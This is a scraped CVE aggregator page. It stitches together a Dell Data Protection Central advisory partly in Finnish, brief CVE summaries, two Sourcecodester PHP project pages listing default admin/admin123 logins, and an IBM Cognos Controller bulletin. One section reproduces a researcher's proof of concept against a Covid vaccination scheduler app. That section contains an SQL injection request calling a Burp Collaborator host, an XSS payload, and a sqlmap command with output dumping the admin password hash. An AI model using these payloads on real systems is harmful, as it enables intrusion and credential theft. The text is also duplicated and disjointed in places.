The HTTP response will disclose the user password. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-23223

Dell EMC Data Protection Central versions 19.5 and prior contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user could potentially exploit this vulnerability, allowing port scanning of external hosts.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-43588

Dell EMC Data Protection Central version 19.5 contains an Improper Input Validation Vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to denial of service.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

CVE-2021-36349

Dell EMC Data Protection Central versions 19.5 and earlier contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user may potentially exploit this vulnerability, allowing port scanning of external hosts.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

 

**Third-party Component**

**CVEs**

**More information**

ntp

CVE-2016-9310

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Apache CXF

CVE-2021-30468

CVE-2021-22696

CVE-2020-13954

Openssl

CVE-2021-3712

Apache HttpClient

CVE-2014-3577

CVE-2012-5783

CVE-2020-13956

CVE-2015-5262

CVE-2012-6153

Spring Framework

CVE-2021-22118

Cron-utils

CVE-2020-26238

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-43588

Dell EMC Data Protection Central version 19.5 contains an Improper Input Validation Vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to denial of service.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

CVE-2021-36349

Dell EMC Data Protection Central versions 19.5 and earlier contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user may potentially exploit this vulnerability, allowing port scanning of external hosts.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

 

**Third-party Component**

**CVEs**

**More information**

ntp

CVE-2016-9310

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Apache CXF

CVE-2021-30468

CVE-2021-22696

CVE-2020-13954

Openssl

CVE-2021-3712

Apache HttpClient

CVE-2014-3577

CVE-2012-5783

CVE-2020-13956

CVE-2015-5262

CVE-2012-6153

Spring Framework

CVE-2021-22118

Cron-utils

CVE-2020-26238

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell EMC Data Protection Central

Versions before 19.6

19.6

Link

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell EMC Data Protection Central

Versions before 19.6

19.6

Link

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2021/01/10

Initial Release

1.1

2021/01/21

Corrected CVE Identifier

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

**Arvostele tämä artikkeli**

Kaikki kentät ovat pakollisia, jollei toisin ole merkitty.

CVE-2021-36349: DSA-2021-262: Dell EMC Data Protection Central Security Update for Multiple Security Vulnerabilities

SQL injection in Sourcecodester Try My Recipe (Recipe Sharing Website - CMS) 1.0 by oretnom23, allows attackers to execute arbitrary code via the rid parameter to the view_recipe page.

CVE-2021-41928: CVE-nu11secur1ty/vendors/oretnom23/CVE-nu11-17-092921 at main · nu11secur1ty/CVE-nu11secur1ty

TeslaMate before 1.25.1 (when using the default Docker configuration) allows attackers to open doors of Tesla vehicles, start Keyless Driving, and interfere with vehicle operation en route. This occurs because an attacker can leverage Grafana login access to obtain a token for Tesla API calls.

CVE-2022-23126: How I got access to 25+ Tesla’s around the world. By accident. And curiosity.

Cross site scripting (XSS) vulnerability in Sourcecodester Online Covid Vaccination Scheduler System v1 by oretnom23, allows attackers to execute arbitrary code via the lid parameter to /scheduler/addSchedule.php.

**CVE-2021-36621****Vendor**

![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/CVE-nu11-18-09-2821/screen.PNG)

**Description**

Sourcecodester Online Covid Vaccination Scheduler System 1.0 is vulnerable to SQL Injection, XSS-STORED PHPSESSID Hijacking, and remote SQL Injection - bypass Authentication. The attacker can be hijacking the PHPSESSID by using this vulnerability and then he can log in to the system and exploit the admin account. Next, exploitation: For MySQL vulnerability, the username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, an attacker can decrypt and obtain the plain-text password. Hence, the attacker could authenticate as an Administrator.

**Request MySQL:**

GET /scheduler/addSchedule.php?lid=(select%20load\_file('%5c%5c%5c%5ciugn0izvyx9wrtoo6c6oo16xeokh87wyymp9fx4.burpcollaborator.net%5c%5cgfd'))&d= HTTP/1.1
Host: localhost
Cookie: PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: \*/\*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

**Respond MySQL:**

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:17:00 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: \*
Content-Length: 5045
Connection: close
Content-Type: text/html; charset=UTF-8

<style\>
#uni\_modal .modal-content>.modal-header,#uni\_modal .modal-content>.modal-footer{
display:none;
}
#uni\_modal .modal-body{
padding-top:0 !important;
}
#location\_modal{
direct
...\[SNIP\]...

**Live test:**

    http://localhost/scheduler/addSchedule.php?lid=(select%20load_file(%27%5c%5c%5c%5ciugn0izvyx9wrtoo6c6oo16xeokh87wyymp9fx4.burpcollaborator.net%5c%5cgfd%27))
    

*   proof: ![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/CVE-nu11-18-09-2821/docs/scheduler-CVE-Critical.gif)

**Request XSS:**

GET /scheduler/addSchedule.php?lid=5&d=v6qfw%3cscript%3ealert(1)%3c%2fscript%3eytpic HTTP/1.1
Host: localhost
Cookie: PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: \*/\*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

**Respond XSS:**

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:16:57 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: \*
Content-Length: 4576
Connection: close
Content-Type: text/html; charset=UTF-8

<style\>
#uni\_modal .modal-content>.modal-header,#uni\_modal .modal-content>.modal-footer{
display:none;
}
#uni\_modal .modal-body{
padding-top:0 !important;
}
#location\_modal{
direct
...\[SNIP\]...
<h3>Schedule Form: (v6qfw<script\>alert(1)</script\>ytpic)</h3>
...\[SNIP\]...

**Live test:**

*   proof: ![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/CVE-nu11-18-09-2821/docs/XSS.gif)

**PoC:**

python sqlmap.py python C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\sqlmap.py \-u "http://localhost/scheduler/classes/Login.php?f=login" \--data="username=admin&password=nu11secur1ty" --cookie="PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump

**OUTPUT:**

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? \[y/N\] N
sqlmap identified the following injection point(s) with a total of 157 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL \>\= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 9211 FROM (SELECT(SLEEP(5)))oCqY) AND 'giEC'='giEC&password=nu11secur1ty
---
\[19:49:38\] \[INFO\] the back-end DBMS is MySQL
\[19:49:38\] \[WARNING\] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? \[Y/n\] Y
web application technology: PHP 7.4.22, Apache 2.4.48
back-end DBMS: MySQL \>\= 5.0.12 (MariaDB fork)
\[19:49:43\] \[INFO\] fetching entries of column(s) 'password,username' for table 'users' in database 'scheduler'
\[19:49:43\] \[INFO\] fetching number of column(s) 'password,username' entries for table 'users' in database 'scheduler'
\[19:49:43\] \[INFO\] retrieved: 1
\[19:49:49\] \[WARNING\] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
\[19:49:56\] \[INFO\] adjusting time delay to 1 second due to good response times
0192023a7bbd73250516f069df18b500
\[19:51:46\] \[INFO\] retrieved: admin
\[19:52:02\] \[INFO\] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools \[y/N\] N
do you want to crack them via a dictionary-based attack? \[Y/n/q\] N
Database: scheduler
Table: users
\[1 entry\]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
+----------+----------------------------------+

\[19:52:02\] \[INFO\] table 'scheduler.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\scheduler\\users.csv'
\[19:52:02\] \[INFO\] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'

\[\*\] ending @ 19:52:02 /2021-09-28/


C:\\Users\\venvaropt\\Desktop\\scheduler-CVE-Critical-CVE-18-09-2821\>

**Reproduce:**

href

**Proof:**

href

CVE-2021-41930: CVE-nu11secur1ty/vendors/oretnom23/CVE-nu11-18-09-2821 at main · nu11secur1ty/CVE-nu11secur1ty

There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.

CVE-2022-23437

SQL injection vulnerability in Sourcecodester Online Leave Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter to /leave_system/classes/Login.php.

Submitted by oretnom23 on Monday, August 23, 2021 - 01:30.

![](https://www.sourcecodester.com/sites/default/files/styles/large/public/images/oretnom23/admin_employee_record.png?itok=MCHIE_Vb)

I have created a **PHP Project** entitled **Online Employee Leave Management System**. This PHP Project provides the company's management and employees an online platform to manage the leave applications. The application is mobile-responsive which is helpful nowadays because most of the employees owning a personal mobile smartphone. Using this system, the employees can easily apply for leave even they are not present in the office. Also, management can easily track the employees' leave records annually and this application has a feature that prevents the employee to apply if they already consumed their leave credits. Each employee's leave privileges are manageable here which means the management can manage the employee's leave privilege and credits individually. The employees' leave credits are automatically reset annually. This online application also generates a printable date-wise report for leave applications.

****About the Online Employee Leave Management System****

This web application was developed using **PHP, MySQL Database, HTML, CSS, JavaScript (Ajax & jQuery), Bootstrap, AdminLTE Template, and some other libraries/plugins**. I created this project using **XAMPP** version 3.30 and does have a **PHP version of 8.0.7**.

The **Online Employee Leave Management System** is easy to use and has a pleasant user interface. This consists of 3 types of system users which are the **Admin**, **Staff**, and **Employee**. The **Admin User** has access and can manage all the features and functionalities of the system. The **Staff User** has only restricted access to some features and functionalities does the **Admin** has. Lastly, the **Employee User** can only track his/her leave records, manage his/her application, and manage his/her system account/credentials.

****Features******Admin Side**

*   **Secure Login/Logout**
*   **Dashboard**
*   **Manage Department List**
*   **Manage Designation List**
*   **Manage List of Leave Types**
*   **Manage Employee List**
*   **Manage Employee's Leave Privilege**
*   **Manage Leave Applications**
*   **Manage User List**
*   **Update Leave Application's Status**
*   **Print Employees Leave Records**
*   **Generate Leave Application Report**
*   **Manage System Settings**
*   **Manage Account Credentials**

**Staff Side**

*   **Secure Login/Logout**
*   **Dashboard**
*   **Manage Employee List**
*   **Manage Employee's Leave Privilege**
*   **Manage Leave Applications**
*   **Update Leave Application's Status**
*   **Print Employees Leave Records**
*   **Generate Leave Application Report**
*   **Manage System Settings**
*   **Manage Account Credentials**

**Employees Side**

*   **Secure Login/Logout**
*   **Dashboard**
*   **View Leave Records**
*   **Print Leave Records**
*   **Create Leave Application**
*   **Manage Leave Application**
*   **Manage Account Credentials**

**System Snapshots******Employee's Record Page****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/admin_employee_record_0.png)

****Leave Application List (Admin)****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/admin_leave_list.png)

****New Employee Form****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/employee_form.png)

****Manage Employee's Leave Privilege and Credits****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/manage_leave_previlege.png)

The source code is free to download on this website. Feel Free to Download and Modify the source code the way you wanted to meet your requirements. Follow the instructions below to run the project.

****How to Run ??****

**`Requirements`**

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

**`Installation/Setup`**

1.  **Open** your **XAMPP/WAMP's Control Panel** and start the **`Apache`** and **`MySQL`**.
2.  **Extract** the **downloaded source code **zip** file**.
3.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
4.  **Browse** the **`PHPMyAdmin`** in a **browser**. i.e. **`http://localhost/phpmyadmin`**
5.  **Create** a **new database** naming **`leave_db`**.
6.  **Import** the provided **`SQL`** file. The file is known as **`leave_db.sql`** located inside the **database** folder.
7.  **Browse** the **Online Employee Leave Management System** in a **browser**. i.e. **`http://localhost/leave_system`**.

**Default Admin Access Information**

Username: **admin**  
Password: **admin123**

_Note: Newly created employee's default system password is his/her Employee ID._

****DEMO****

That's it. You can now explore the features and functionalities of this **Online Employee Leave Management System** that was developed using **PHP Language** and **MySQL Database**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   4635 views

CVE-2021-40595: Online Leave Management System in PHP Free Source Code

SQL injection vulnerability in Sourcecodester Budget and Expense Tracker System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username field.

Submitted by oretnom23 on Friday, July 30, 2021 - 16:17.

![](https://www.sourcecodester.com/sites/default/files/styles/large/public/images/oretnom23/dashboard_1.png?itok=R-86mAXn)

****Introduction****

This is a **PHP Project** entitled **Budget and Expense Tracker System**. This system is a web-based application that manages your personal/small business budget and expenses. With this, you can easily track the entries budget and expenses by category. The project is simple, has a pleasant user interface, and is easy to use.

****About the Budget and Expense Tracker System****

This **Budget and Expense Tracker System** was developed using PHP, MySQL Database, HTML, CSS, JavaScript (Ajax and jQuery), Bootstrap, AdminLTE Template, and other plugins/libraries. The system has a secure login feature. The list all the budget categories dynamically. Expenses will depend on the current balance that does the category have which means that the user can only store expense data less than or equal to the category's current balance. The system also generates date-wise budget entry and expenses reports. The summary of the balances is shown on the dashboard page and each balance of the categories is automatically updated when new budget entries and expenses records are created.

**How to Use:**

The system is easy to use but the following is a must and in order when the system data/records are still empty.

1.  Log in to the system using the user system credentials.
2.  Populate the list of budget categories.
3.  Create/Populate the list of budget entries.
4.  After the steps above, you now manage or create an expense record.

****Features****

*   **Secure Login**
*   **Manage Category List**
*   **Manage Budget Entries**
*   **Manage Expenses**
*   **View Balances Summary**
*   **Generate Printable Budget Report**
*   **Generate Printable Expense Report**
*   **Date-wise Reports**
*   **Manage System Information**
*   **Manage Account Details**

****Sample Snapshots****

**Dashboard Page/Balances Summary**

![B&E Snapshots](https://www.sourcecodester.com/sites/default/files/images/oretnom23/dashboard_4.png)

**Budget Entries Report**

![B&E Snapshots](https://www.sourcecodester.com/sites/default/files/images/oretnom23/budget_report.png)

**Expenses Report**

![B&E Snapshots](https://www.sourcecodester.com/sites/default/files/images/oretnom23/expense_report.png)

The Source Code is free to download on this website. Feel Free to download and modify the source code the way you wanted. Follow the instructions below to run this project.

****How to Run****

**Requirements**

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

**Installation/Setup**

1.  **Open** your **XAMPP/WAMP's Control Panel** and start the **`Apache`** and **`MySQL`**.
2.  **Extract** the **downloaded source code **zip** file**.
3.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
4.  **Browse** the **`PHPMyAdmin`** in a **browser**. i.e. **`http://localhost/phpmyadmin`**
5.  **Create** a **new database** naming **`expense_budget_db`**.
6.  **Import** the provided **`SQL`** file. The file is known as **`expense_budget_db.sql`** located inside the **database** folder.
7.  **Browse** the **Budget and Expense Tracker System** in a **browser**. i.e. **`http://localhost/expense_budget`**.

****Default User Access Information:****

Username: **admin**  
Password: **admin123**

****DEMO****

That's it! You can now explore the features and functionalities of this **Budget and Expense Tracker System** in **PHP**. I hope this will help you with what you are looking for. Explore more on this website for more Free Source Code and Tutorials.

**Enjoy :)**

*   5076 views

CVE-2021-40247: Budget and Expense Tracker System in PHP Free Source Code

IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 could allow a remote attacker to bypass security restrictions, caused by improper validation of authentication cookies. IBM X-Force ID: 190847.

  

**Summary**

This Security Bulletin addresses multiple vulnerabilities that have been remediated in IBM Cognos Controller 10.4.0 IF11, 10.4.1 IF12 and 10.4.2 IF17. There are multiple vulnerabilities in IBM® Runtime Environment Java™ used by IBM Cognos Controller. The applicable CVEs have been addressed by upgrading to IBM® Runtime Environment Java™ Version 8 Service Refresh 6 Fix Pack 15. If you run your own Java code using IBM® Runtime Environment Java™ delivered with this product, you should evaluate your code to determine whether additional Java vulnerabilities are applicable to your code. For a complete list of vulnerabilities, refer to the "IBM Java SDK Security Bulletin", located in the References section for more information. There are vulnerabilities in IBM WebSphere Application Server Liberty used by IBM Cognos Controller. The applicable CVEs have been addressed by upgrading to IBM WebSphere Application Server Liberty 20.0.0.7. XML External Entity (XXE), Authentication Bypass, External (XXE) and Modification of Assumed-Immutable Data (MAID) vulnerabilities have also been addressed in applicable versions. Please note that IBM Cognos Controller 10.4.2 IF17 also addresses Apache Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. (See References).

**Vulnerability Details**

**CVEID:**   CVE-2020-4876  
**DESCRIPTION:**   IBM Cognos Controller is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.  
CVSS Base score: 7.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/190839 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L)

**CVEID:**   CVE-2020-14577  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to obtain sensitive information resulting in a low confidentiality impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/185055 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2020-14578  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/185056 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2020-14579  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/185057 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2020-4329  
**DESCRIPTION:**   IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0 and Liberty 17.0.0.3 through 20.0.0.4 could allow a remote, authenticated attacker to obtain sensitive information, caused by improper parameter checking. This could be exploited to conduct spoofing attacks. IBM X-Force ID: 177841.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/177841 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2020-4879  
**DESCRIPTION:**   IBM Cognos Controller could allow a remote attacker to bypass security restrictions, caused by improper validation of authentication cookies.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/190847 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2020-4877  
**DESCRIPTION:**   IBM Cognos Controller could be vulnerable to unauthorized modifications by using public fields in public classes.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/190843 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2019-2962  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the 2D component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/169268 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2019-2983  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/169289 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2019-2989  
**DESCRIPTION:**   An unspecified vulnerability in Java SE could allow an unauthenticated attacker to cause no confidentiality impact, high integrity impact, and no availability impact.  
CVSS Base score: 6.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/169295 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N)

**CVEID:**   CVE-2019-2992  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the 2D component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/169298 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2019-12406  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by the failure to restrict the number of message attachments present in a given message. By sending a specially-crafted message containing an overly large number of message attachments, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/170974 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2020-4875  
**DESCRIPTION:**   IBM Cognos Controller is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.  
CVSS Base score: 7.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/190838 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L)

**CVEID:**   CVE-2019-4732  
**DESCRIPTION:**   IBM SDK, Java Technology Edition Version 7.0.0.0 through 7.0.10.55, 7.1.0.0 through 7.1.4.55, and 8.0.0.0 through 8.0.6.0 could allow a local authenticated attacker to execute arbitrary code on the system, caused by DLL search order hijacking vulnerability in Microsoft Windows client. By placing a specially-crafted file in a compromised folder, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 172618.  
CVSS Base score: 7.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/172618 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H)

**Affected Products and Versions**

IBM Cognos Controller 10.4.2

IBM Cognos Controller 10.4.1

IBM Cognos Controller 10.4.0

**Remediation/Fixes**

The recommended solution is to apply the fix for versions listed as soon as practical:

IBM Cognos Controller 10.4.0 IF11, 10.4.1 IF12, 10.4.2 IF17

**Affected Version**

**Fix Version**

IBM Cognos Controller 10.4.2

IBM Cognos Controller 10.4.2 IF17

IBM Cognos Controller 10.4.1

IBM Cognos Controller 10.4.1 IF12  

IBM Cognos Controller 10.4.0

IBM Cognos Controller 10.4.0 IF11

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

20 January 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS9S6B","label":"Cognos Controller"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"10.4.2, 10.4.1, 10.4.0","Edition":"All","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

Tag

#apache